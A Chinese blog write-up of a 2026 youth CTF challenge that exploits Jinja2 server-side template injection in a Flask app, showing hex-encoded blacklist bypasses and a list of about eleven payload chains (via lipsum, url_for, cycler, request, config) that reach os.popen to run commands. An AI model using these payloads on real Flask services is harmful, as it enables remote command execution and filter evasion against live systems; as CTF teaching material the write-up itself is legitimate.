【青少年CTF S1·2026 公益赛】答案之书

大方子2026-04-17 12:06

题目是 Python Flask 环境。在输入框输入 {{7*7}},页面回显 49,确认存在 Jinja2 SSTI 漏洞

复制代码 
Flask的默认模板引擎是Jinja,且支持{{ 表达式 }}运算,因此可以判断是Jinja

尝试输入 {{config}}、{{flag}} 或 {{''.class}},页面提示"禁忌之语"或报错。

题目设置了黑名单,过滤了 os、flag、system、popen、globals 等敏感关键词。

使用Hex编码绕过关键字过滤

使用中括号形式避免.的过滤

Python支持十六进制Hex,可以使用Hex编码来绕过关键字过滤

如:os 可以写成 \x6f\x73,WAF 认不出这是 os,但 Python 后端执行时会自动还原。

同时,为了避免使用点号 . 可能带来的过滤,使用字典中括号 ['...'] 的形式调用属性。

攻击链

复制代码 
找一个内置对象 (lipsum 或 url_for) -> 获取全局变量 (__globals__) -> 引入 os 模块 -> 调用 popen 执行命令 -> read 读取结果。

globals -> \x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f
os -> \x6f\x73
popen -> \x70\x6f\x70\x65\x6e
cat /flag -> \x63\x61\x74\x20\x2f\x66\x6c\x61\x67`

payload如下

python 复制代码 
使用lipsum 模块
/?question={{lipsum['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}
或者使用url_for模块
/?question={{url_for['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}
或者使用cycler 模块
/?question={{cycler['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x6f\x73']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')['\x72\x65\x61\x64']()}}

上面payload的字符形式如下

python 复制代码 
{{lipsum['__globals__']['os']['popen']('cat /flag')['read']()}}

{{url_for['__globals__']['os']['popen']('cat /flag')['read']()}}

{{cycler['__init__']['__globals__']['os']['popen']('cat /flag')['read']()}}

得到flag

下面是常见的跳板模板

python 复制代码 
# 1. lipsum(最常用)
{{lipsum['__globals__']['os'].popen('cat /flag').read()}}

# 2. url_for(Flask 必带)
{{url_for['__globals__']['os'].popen('cat /flag').read()}}

# 3. cycler(Jinja2 必带)
{{cycler['__init__']['__globals__']['os'].popen('cat /flag').read()}}

# 4. request(超级稳)
{{request['__class__']['__init__']['__globals__']['os'].popen('cat /flag').read()}}

# 5. namespace
{{namespace['__globals__']['os'].popen('cat /flag').read()}}

# 6. dict / list / int 等原生类型
{{dict['__class__']['__bases__'][0]['__subclasses__']()[...].popen(...).read()}}

# 7. joiner
{{joiner['__globals__']['os'].popen('cat /flag').read()}}

# 8. g(Flask全局对象)
{{g['__globals__']['os'].popen('cat /flag').read()}}

# 9. namespace
{{self['__globals__']['os'].popen('cat /flag').read()}}

# 10. get_flashed_messages
{{get_flashed_messages.__globals__.os.popen('cat /flag').read()}}

# 11. config
{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
相关推荐
星依网络1 小时前
文件上传漏洞绕过技巧 - 实战详解
web安全·网络安全
Chengbei112 小时前
OneScan二开升级,bypass防重放递归目录扫描+指纹识别Burp插件
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
视觉&物联智能5 小时前
【杂谈】-筑牢企业防线:抵御恶意人工智能代理的攻击
人工智能·网络安全·ai·企业安全·agi
C2H5OH16 小时前
PortSwigger SQL注入LAB2
网络安全
Chockmans1 天前
春秋云境CVE-2019-9618
安全·web安全·网络安全·系统安全·网络攻击模型·春秋云境·cve-2019-9618
酿情师1 天前
Shiro 反序列化漏洞原理(小白零基础详解)
java·web安全·网络安全
vortex51 天前
基于开发关键词的子域名Fuzz方法
网络安全
一名优秀的码农1 天前
vulhub系列-46-dGears of War: EP#1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
网络安全许木1 天前
自学渗透测试第16天(Linux文本处理进阶)
linux·运维·服务器·网络安全·渗透测试
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛05GPT-6发布日深度解析-Symphony架构200万Token实战06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南08GPT-6核心能力解析及与现有主流大模型对比09零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)10从限购到畅通:GLM-5.1 Coding Plan接入攻略